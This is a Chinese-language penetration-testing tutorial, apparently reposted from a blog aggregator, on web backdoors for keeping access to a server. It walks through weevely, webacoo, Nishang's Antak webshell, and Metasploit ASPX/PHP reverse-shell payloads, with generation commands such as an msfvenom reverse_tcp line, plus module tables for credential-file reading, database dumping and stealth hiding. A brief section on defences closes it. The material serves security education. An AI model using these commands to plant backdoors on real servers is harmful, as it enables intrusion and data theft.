用途限制声明,本文仅用于网络安全技术研究、教育与知识分享。文中涉及的渗透测试方法与工具,严禁用于未经授权的网络攻击、数据窃取或任何违法活动。任何因不当使用本文内容导致的法律后果,作者及发布平台不承担任何责任。渗透测试涉及复杂技术操作,可能对目标系统造成数据损坏、服务中断等风险。读者需充分评估技术能力与潜在后果,在合法合规前提下谨慎实践。

在这里,我们主要讲述权限维持第二种讲述,web后门以及防范。

Web后门

定义: 指上传到Web服务器可访问目录中的脚本文件(如.php.aspx.jsp.asp),允许攻击者通过HTTP/HTTPS请求在服务器上远程执行操作系统命令。接下来就是讲述几个常见的Web后门,

1)Nishang下的Webshell

简介:Nishang 是一个基于 PowerShell 的渗透测试工具包,其中包含多种 Webshell 变体。这些 Webshell 利用 PowerShell 的强大功能,可在 Windows 系统上执行命令、上传 / 下载文件。

特点:

  • 基于 PowerShell,支持高级系统交互。
  • 可通过 HTTP/S 通信,隐蔽性较强。
  • 支持反向 Shell 和绑定 Shell 模式。

项目下载地址:https://github.com/samratashok/nishang

在Nishang中也存在ASPX的“大马”,该模块在、nishang\Antak-Webshell目录下。使用该模块可以进行编码、执行脚本、上传/下载文件等

我们把他放在目标机的web应用下,浏览器访问即可,如图所示

2)weevely后门

简介:Weevely 是一款针对 PHP 环境的开源 webshell 工具,主要用于渗透测试中生成、管理和控制 PHP 类型的后门,因其隐蔽性强、功能丰富且操作便捷,被广泛用于 Web 渗透场景。

核心特点

  1. 隐蔽性高
    Weevely 生成的 webshell 采用Base64 编码字符串混淆技术,将核心逻辑隐藏在看似正常的 PHP 代码中(例如伪装成普通函数调用),传统基于特征码的查杀工具(如简单关键词匹配)难以识别。

  2. 功能模块化
    集成了丰富的渗透模块,支持文件操作、系统命令执行、数据库交互、端口转发、持久化控制等,满足从初始入侵到深度控制的全流程需求。

  3. 交互便捷
    提供命令行客户端,生成 webshell 后可通过客户端直接连接目标,以 “交互式 shell” 的形式操作,类似 SSH 会话,降低操作复杂度。

这个工具kali自带

生成 webshell
用户通过 Weevely 的命令行工具,指定一个密码(用于后续连接验证)和输出文件名,生成一个 PHP 格式的 webshell 文件。例如:

weevely generate 123456 /tmp/backdoor.php  # 生成密码为123456的webshell  

生成的backdoor.php包含加密的核心逻辑,仅当攻击者使用正确密码连接时,才能激活并执行命令。

上传文件

上传目标服务器,

然后再连接,访问

weevely http://ip/bachdoor.php 密码

  成功连接,接下来就是通过一系列的命令进行操作了

这里我详细介绍一下weevely的模块功能,操作不再展示

审计类模块(找漏洞 / 敏感信息)

模块名功能说明
:audit_phpconf检查 PHP 配置(如allow_url_fopendisable_functions),找安全隐患
:audit_suidsgid查找带 SUID/SGID 权限 的文件(这类文件可能被用来提权,如/bin/su
:audit_filesystem审计文件系统权限(如敏感文件/etc/shadow是否被 Web 用户可读)
:audit_etcpasswd读取/etc/passwd(收集系统用户信息,辅助后续攻击)

Shell 执行模块(远程命令 / 代码)

模块名功能说明
:shell_php直接执行 PHP 代码(如 :shell_php "echo phpinfo();"
:shell_sh执行系统 Shell 命令(和shell命令类似,模块化封装)
:shell_su尝试用 su 命令提权(需知道目标用户密码,如尝试su root

系统信息收集

模块名功能说明
:system_extensions收集 PHP 扩展(如是否开启mysqliexec等危险模块)和 Web 服务器信息
:system_info抓取系统核心信息(内核版本、OS 类型、Web 服务版本、PHP 版本等)

后门模块(持久化 / 反向连接)

模块名功能说明
:backdoor_reversetcp启动 反向 TCP Shell(目标主动连攻击者 IP + 端口,绕过防火墙出站限制)
:backdoor_tcp在目标机器 绑定 TCP 端口(攻击者主动连该端口获取 Shell,需目标端口可访问)

文件操作模块(上传 / 下载 / 编辑)

模块名功能说明
:file_upload上传本地文件到目标服务器
:file_upload2web自动上传文件到 Web 可访问目录(如/var/www/html,方便直接访问)
:file_read读取远程文件内容(如/etc/passwd、数据库配置文件)
:file_download下载远程文件到本地(Weevely 客户端所在机器)
:file_rm删除远程文件
:file_edit本地编辑器修改远程文件(保存后自动上传,方便改配置)
:file_gzip/:file_tar压缩 / 解压文件(批量下载时缩小体积,或隐藏恶意文件)

数据库模块(脱库 / 提权)

模块名功能说明
:bruteforce_sql暴力破解 SQL 数据库(尝试常用账号密码,支持 MySQL、PostgreSQL 等)
:sql_dump导出数据库(类似mysqldump,批量下载表数据)
:sql_console进入 SQL 交互控制台(直接执行查询,如SHOW DATABASES;

网络模块(跳板 / 扫描)

模块名功能说明
:net_php_proxy在目标安装 PHP 代理(将目标当跳板,转发攻击者的 HTTP 请求)
:net_curl模拟curl发送 HTTP 请求(测试目标网络访问能力,或访问内网服务)
:net_scanTCP 端口扫描(探测目标或内网主机的开放端口,找可利用服务)
3)webacoo后门

简介:Webacoo(全称 Web Backdoor Cookie)是一款 隐蔽型 Web 后门工具,专为渗透测试的后渗透阶段设计,核心特点是利用 HTTP Cookie 传输指令和数据,躲避传统安全设备检测。

  • 作用:在已攻陷的 Web 服务器中植入后门,实现远程命令执行、文件操作、权限维持
  • 隐蔽性原理
    命令和结果通过 HTTP Cookie 传输,而非普通 HTTP 请求体。关键 Cookie 参数:
    • cm:Base64 编码的 Shell 命令(如cm=YmFzZTY0X2VuY29kZQ==对应base64_encode)。
    • cn:存储命令结果的 Cookie 名称(如服务器将结果存到result Cookie)。
    • cp:结果的分隔符(避免与正常 Cookie 混淆)。

Webacoo 有 两种核心模式,通过命令行参数切换:

1. 生成模式(-g):制作 PHP 后门

webacoo -g -o /path/backdoor.php

  • 作用:生成一个 PHP 后门文件(如backdoor.php),上传到目标服务器的Web 可访问目录(如/var/www/html)。

2. 终端模式(-t):连接后门

webacoo -t -u http://目标IP/backdoor.php

  • 作用:连接已上传的后门,进入交互终端,执行系统命令(如lswhoami)。

此工具kali自带,无需安装

生成后门

 放在目标服务器,浏览器访问一下

进行连接

 成功连接,连接之后是一个仿真终端,能够通过执行命令获得信息。

    

也能够通过使用命令load查找扩展模块

这里解释一下模块的作用,操作不展示

数据库模块(MySQL/PostgreSQL)

1. MySQL 命令行模块(mysql-cli)

mysql-cli <IP(:端口)> <用户名> <密码>

示例:连接本地 MySQL,用户名为root,密码为123456

webacoo$ mysql-cli 127.0.0.1 root 123456

连接后:可直接执行 SQL 命令(无需退出 Webacoo)

> SHOW DATABASES;
> USE wordpress;
> SELECT * FROM wp_users;

2. PostgreSQL 命令行模块(psql-cli)

psql-cli <IP(:端口)> <数据库名> <用户名> <密码>

示例:连接本地 PostgreSQL 的testdb数据库

webacoo$ psql-cli 127.0.0.1:5432 testdb postgres 123456

连接后:执行 SQL 命令

> \dt        # 查看表
> SELECT * FROM users;

文件操作模块(上传 / 下载)

1. 上传文件(upload)

upload <本地文件路径> <远程目标目录>

示例:上传本地的shell.php到目标服务器的/var/www/html目录

webacoo$ upload /home/user/shell.php /var/www/html/

2. 下载文件(download)

download <远程文件路径>

示例:下载目标服务器的/etc/passwd文件到本地

webacoo$ download /etc/passwd

文件会保存到:Webacoo 工具所在目录(默认不指定本地路径)

隐蔽性增强模块(stealth)

功能:通过修改 PHP 后门代码,进一步隐藏后门特征

stealth <网站根目录>

示例:将后门伪装成网站正常文件(假设网站根目录为/var/www/html

webacoo$ stealth /var/www/html

 与weevely相比

特性WebacooWeevely
通信方式HTTP CookieHTTP Headers(更隐蔽)
权限保护无密码支持密码验证
功能丰富度基础命令 / 文件操作模块化(审计、提权、隧道)
适用场景临时控制、快速渗透深度后渗透、长期维持
4)ASPX meterpreter后门

这个后门是msfconsole中名为shell_reverse_tcp的payload,shell_reverse_tcp是最基础且常用的反向 TCP Shell Payload,用于在目标系统上建立一个反向连接,使攻击者能够获得远程命令执行权限,利用这个模块可以创建具有meterpreter的各种版本shellcode。

首先先使用下列代码并且调用该模块,并且设置相关参数

use windows/shell_reverse_tcp
info
set lhost ip
set lport 55555
save

 然后输入generate -h查看命令

生成webshell 

generate -f aspx lhost=ip地址

将生成内容保存为aspx.aspx文件,然后上传到目标服务器web目录下,在浏览器进行访问,然后使用监听连接即可,这里不再展示。

进行访问 

 进行连接

5)PHP meterpreter后门

简介:PHP Meterpreter 是 Metasploit 框架 中针对 PHP 环境 设计的 payload,可生成具备 Meterpreter 交互功能 的 Webshell,支持系统命令执行、文件操作、权限提升等后渗透操作,是 Web 渗透中隐蔽且强大的工具。

优势细节说明局限
功能集成度高继承 Meterpreter 的交互性,支持 Metasploit 后续模块(如提权、内网穿透)依赖 PHP 环境,需目标开启执行权限
隐蔽性较好代码默认经过混淆,通信可加密(如reverse_https payload)易被 WAF 检测特征(需额外混淆)
跨平台兼容支持 Linux/Windows 的 PHP 服务器需目标disable_functions未禁用系统命令函数(如exec

直接通过msfvenom制作PHP Meterpreter

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php

然后跟上面ASPX差不多,将生成的文件放在目标服务器的web目录下,然后开启监听,访问,反弹连接即可,操作这里不再展示。 

web后门防范

  1. 代码安全:禁用 eval、system 等危险函数;严格验证用户输入(过滤特殊字符、限制长度);上传文件需校验内容(而非仅扩展名)。
  2. 组件管控:使用官方 / 可信源的框架 / 插件;定期更新修复漏洞;删除无用组件。
  3. 服务器加固:web 进程权限设为最低(非 root);限制文件目录权限(如上传目录禁止执行脚本);关闭不必要的服务 / 模块(如 cgi、SSI)。
  4. 监控审计:日志记录访问 / 操作行为(重点查异常文件访问、高频 POST 请求);定期校验文件哈希(检测篡改)。
  5. 访问控制:管理员账户用强密码 + 定期更换;限制管理后台访问 IP;启用二次验证。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/news/916541.shtml
繁体地址,请注明出处:http://hk.pswp.cn/news/916541.shtml
英文地址,请注明出处:http://en.pswp.cn/news/916541.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CentOS 9 配置国内 YUM 源

1.备份 sudo mv /etc/yum.repos.d/centos.repo /etc/yum.repos.d/centos.repo.backup sudo mv /etc/yum.repos.d/centos-addons.repo /etc/yum.repos.d/centos-addons.repo.backup2.创建新文件 vi /etc/yum.repos.d/centos.repo[baseos] nameCentOS Stream $releasever - BaseO…

【算法】递归、搜索与回溯算法入门

文章目录递归什么是递归为什么会用到递归如何理解递归如何写好一个递归搜索 vs 深度优先遍历 vs 深度优先搜索 vs 宽度&#xff08;广度&#xff09;优先遍历 vs 宽度&#xff08;广度&#xff09;优先搜索 vs 暴搜深度优先遍历 vs 深度优先搜索&#xff08;dfs&#xff09;宽度…

借助Aspose.HTML控件,在 Python 中将 SVG 转换为 PDF

您可能会发现许多解决方案都提供以编程方式将SVG转换为PDF 的功能。但这篇博文将介绍一个功能强大的 SDK&#xff0c;供 Python 开发人员自动化文件转换和操作。本指南将重点介绍通过 .NET 实现 Python 的 Aspose.HTML。此外&#xff0c;我们将逐步讲解相关步骤和代码片段&…

高级06-Java网络编程:从Socket到HTTP

引言&#xff1a;Java 网络编程的重要性 随着互联网技术的飞速发展&#xff0c;网络编程已成为现代软件开发中不可或缺的一部分。Java 作为一种广泛应用于企业级开发和分布式系统的编程语言&#xff0c;提供了强大的网络通信支持。从底层的 Socket 编程到高层的 HTTP 协议处理&…

STM32的蓝牙通讯(HAL库)

蓝牙基础知识&#xff08;了解即可&#xff09;&#xff1a;1.是一种利用低功率无线电&#xff0c;支持设备短距离通信的无线电技术&#xff0c;能在包括移动电话、PDAQ、无线耳机、笔记本电脑、相关外设等众多设备之间进行无线信息交换&#xff0c;蓝牙工作在全球通用的2.4 GH…

方案B,version1

我们重新设计起步阶段的步骤,目标是:通过运行PowerShell脚本和配置GitHub Actions工作流(deploy.yml)来实现自动化部署。 要求: 用私有仓库(my-website-source-SSH)存储源码。 通过GitHub Actions自动构建(这里只是简单的Hello World,所以构建步骤可以简化为复制文件…

Linux --- 进程

一、进程概念 在 Linux 系统中&#xff0c;​​进程&#xff08;Process&#xff09;​​ 是程序执行的动态实例&#xff0c;是操作系统进行资源分配和调度的基本单位。 ​​1. 程序 vs 进程​​ ​​程序&#xff08;Program&#xff09;​​&#xff1a;是静态的代码集合&…

Cgroup 控制组学习(三)在容器中使用 CGroups

一、CGroups 关于mememory的限制操作 cgroup关于cpu操作 关于memeory cgroup的几个要点 ① memeory限额类 1、memory.limit_bytes&#xff1a;硬限制--> 限制最大内存使用量&#xff0c;单位有k、m、g三种&#xff0c;填-1则代表无限制,默认是字节2、memory.soft_limi…

SpringBoot面试基础知识

SpringBoot 是面试中后端开发岗位的高频考点&#xff0c;以下是核心考点整理&#xff1a;1. SpringBoot 基础概念- 定义&#xff1a;SpringBoot 是 Spring 框架的简化版&#xff0c;通过“自动配置”“起步依赖”等特性&#xff0c;简化 Spring 应用的搭建和开发&#xff0c;减…

Java面试全方位解析:从基础到AI的技术交锋

Java面试全方位解析&#xff1a;从基础到AI的技术交锋 面试场景&#xff1a;互联网大厂Java工程师岗位面试 面试官&#xff1a;您好&#xff0c;我是今天的面试官&#xff0c;接下来我们将进行三轮技术面试。 谢飞机&#xff1a;您好您好&#xff01;我是谢飞机&#xff0c;特别…

Web Worker:解锁浏览器多线程,提升前端性能与体验

目录 一、Web Worker 是什么&#xff1f; 核心特性 类型 二、为什么需要 Web Worker&#xff1f;(单线程的痛点) 三、Web Worker 的典型使用场景 四、一个简单的代码示例 (专用 Worker) 五、使用 Web Worker 的注意事项 六、总结 一、Web Worker 是什么&#xff1f; 简…

LabVIEW命令行调用与传参功能

该功能一方面借助 Formatinto String 构建命令行字符串&#xff0c;实现LabVIEW 环境下命令行调用 VI 并传参&#xff1b;另一方面&#xff0c;针对 Mac 平台&#xff0c;通过解析应用 Info.plist 文件&#xff0c;处理 LabVIEW 可执行文件路径&#xff0c;完善跨平台命令行调用…

使用FRP搭建内网穿透工具,自己公网服务器独享内外网端口转发

内网穿透&#xff0c;也即 NAT 穿透&#xff0c;进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。简单来说&#xff0c;就是让互联网&#xff08;外网&#xff09;设备能访问局域网&#xff08;内网&#xff09;设备提…

JavaWeb01——基础标签及样式(黑马视频笔记)

1.如何用VScode写html代码 1. 首先在vscode上安装一些插件&#xff0c;插件如下&#xff1a; 2.打开你要写入的html文件的文件夹&#xff0c;然后右击“ 新建文件”&#xff0c;命名 “xxx.html”, 3.如果是写 css文件&#xff0c;那么也是右击“新建文件”&#xff0c;命名“x…

在2G大小的文件中,找出高频top100的单词

将 2GB 的大文件分割为 2048 个大小为 512KB 的小文件&#xff0c;采用流式读取方式处理&#xff0c;避免一次性加载整个文件导致内存溢出。初始化一个长度为 2048 的哈希表数组&#xff0c;用于分别统计各个小文件中单词的出现频率。利用多线程并行处理机制遍历所有 2048 个小…

基于LNMP分布式个人云存储

1.准备工作a.关闭两台虚拟机的安全软件客户端&#xff1a;[rootmaster ~]# systemctl stop firewalld [rootmaster ~]# systemctl disable firewalld [rootmaster ~]# systemctl status firewalld ○ firewalld.service - firewalld - dynamic firewall daemonLoaded: loaded (…

指针运算全攻略:加减、比较与排序

常见的指针指针运算说明1.指针与整数的加减运算对指针可以进行加法运算&#xff0c;即p n或者p - n。其结果依旧是一个是一个指针&#xff0c;新的指针是在原来的地址值基础上加上/减去n *(sizeof(指针指向的数据类型)&#xff09;个字节。示例&#xff1a;#include<stdio.…

物联网安装调试-物联网网关

物联网网关作为连接终端设备与云平台的核心枢纽,其分类与选型需结合功能定位、硬件性能、连接方式及应用场景等多维度考量。以下从分类体系和产品推荐两方面系统梳理,助您高效决策: 🔧 一、物联网网关分类体系 1. 按功能定位划分 类型 核心能力 典型场景 代表产品 边缘计…

Jenkins教程(自动化部署)

Jenkins教程(自动化部署) 1. Jenkins是什么&#xff1f; Jenkins是一个开源的、提供友好操作界面的持续集成(CI)工具&#xff0c;广泛用于项目开发&#xff0c;具有自动化构建、测试和部署等功能。Jenkins用Java语言编写&#xff0c;可在Tomcat等流行的servlet容器中运行&…

linux 驱动验证是否成功 之 查看moudle信息

这些是 Linux 内核模块&#xff08;.ko&#xff09;中的元信息&#xff08;metadata&#xff09;&#xff0c;可以通过如下方式查看&#xff1a;✅ 1. 使用 modinfo 命令查看已加载或已编译模块信息 示例&#xff1a; modinfo aw2013.ko输出内容大概如下&#xff1a; filename:…